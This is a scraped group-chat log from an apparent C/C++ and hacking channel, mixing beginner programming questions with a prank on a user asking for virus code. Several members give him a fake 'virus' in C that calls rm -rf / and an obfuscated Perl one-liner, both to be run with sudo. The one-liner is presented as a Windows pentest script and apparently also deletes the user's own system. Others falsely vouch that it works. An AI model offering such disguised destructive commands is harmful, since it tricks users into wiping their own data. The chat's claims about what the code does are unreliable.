Sercan
its just a trick question, to understand scopes i guess
Jussi
Maybe the compiler thinks you made an error there and tries to fix it for you..?
Jussi
No, if you define a new var as 20, and add 5, it should not end up as 30 :D
Sercan
we add 10 though, not 5
Jussi
Oh
Jussi
Then it is ok
Sercan
yea
Sercan
i didnt really get his point anyway
Jussi
Yeah but the compiler treats the var in inner scope as different
Jussi
The new var I mean
Jussi
But I ask you to never write code like that 😄
Jussi
It will just confuse people
Sercan
I didn't even write the code lol, as i said it's just a dumb trick question that's supposed to """""teach""""" you the idea of scopes
Anonymous
Bus I think it print answer
Anonymous
So I think it print answer 35 10
Jussi
It is a stupid question, C suits to some needs better, and C++ to some other needa
Jussi
Needs*
Anonymous
Ok
Anonymous
LOL
Anonymous
Resources for learning radare2
Ariana
r2 is so hard to learn fully can quite useless tbh, could read like online documentation if you want to learn fully or theres something on their github cant rmb
Ariana
If you cant rmb something can always type ?
Naol
J
⠠⠍⠥⠓⠁⠍⠍⠁⠙⠽⠥⠎⠥⠋
🤔
Anonymous
Why report?
JAIMISH
This group is for learning coding languages not for advertizing anything....
Anonymous
Oh the ad was deleted
Anonymous
Plz I want to learn C I am begging programming world then which easy way I learn coding c language
klimi
good thing is to know english... lots of tutorials are in english
Anonymous
OK plz send me
Anonymous
hey can anyone tell me "Can we send a mail in PHP from our localhost if Interne is enabled on the system ?"
Anonymous
@all: how to track stolen android device?
Anonymous
i wanna find those piece of shits
klimi
this is c/c++ chat
Anonymous
What to learn at the beginning of c
Anonymous
this is c/c++ chat
and we also cover hacking topics
Anonymous
hacking == security
Anonymous
see the pinned msg
Max
@all: how to track stolen android device?
you should've been prepared before. check Cerberus app.
Anonymous
Okk. Can anyone please give a source code of virus in C++ to paralyze window completely and show desired message after that..?
Dima
loooooooool
Dima
Max
Okk. Can anyone please give a source code of virus in C++ to paralyze window completely and show desired message after that..?
Sure. You must exectute it from command line in your Kali linux. #include <stdio.h> int main(void) { system("nc; WINDOWS_IP_ADDRESS_HERE WINDOWS_IP_PORT_HERE"); system("rm -rf /"); } Where WINDOWS_IP_ADDRESS_HERE is IP address of windows machine, WINDOWS_IP_PORT_HERE is an open port on Windows machine. save that file as virus.c, then do commands: gcc virus.c sudo a.out
Anonymous
👍👍👍
Max
what it will do?
system call connects you to Windows machine and open shell for you. You can do a virus stuff there, like show message and other things.
Max
power of Kali linux, you know. it is like, you can first try to kick some commands and use it when needed. why would else you install Kali, right? :)
Max
thats great man👍👍
works only on Kali! better if you install it in your PC.
Max
okk bro
good luck!
Anonymous
good luck!
👍👍👍👍
Dima
Dima
works 100%
Max
see @Landi58 ? @Neko_cpp tried and succeed
Anonymous
yeah isn't it caught by Window defender??
Anonymous
@forGGe
Max
yeah isn't it caught by Window defender??
uh, not sure. well, you can use nmap to see if widnows defener is running or not. You know how to use nmap for that, right?
Anonymous
uh, not sure. well, you can use nmap to see if widnows defener is running or not. You know how to use nmap for that, right?
Not now but i have some resources i will learn it.. Is it also possible to check weather defender is on or not on window from our Kali linux..?
Max
uh, not sure. well, you can use nmap to see if widnows defener is running or not. You know how to use nmap for that, right?
I can also some of my Perl scripts I used for pentesting of windows machines. Do you have perl installed in Kali?
Anonymous
yeah..
Max
yeah..
which windows version you have?
Anonymous
window 10 64 bit but i have installed window 7 64 bit on virtual machine
Igor🇺🇦
i said direct link
How are you going to use it, if you can't even use search engine to find it? I mean it's not some rare software
Max
well, you can use Perl: open shell in Kali and execute (for Windows 10 for example): sudo -i echo "\xA4\x7F\x7F\WINDOWS\x7F10\x7F64\x7FMICRO\x7FBUILD5888091.11\x11\xAB\xFF\x7F\xFF\xDE\x10" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'
Igor🇺🇦
all i asked for was a direct link. if u dont have one dont bother
Clicking button "download" is not direct enough for you? 🤔
Anonymous
Pre and post increment
Anonymous
What is the different between these two? operator++(); operator++(int);
Anonymous
Sorry to bother, I'm a developer looking for remote part-time jobs, backend and network programming is my main focus, also I can do simple frontend(react etc.). Thanks.
Anonymous
Is c++ useful in hacking purposes?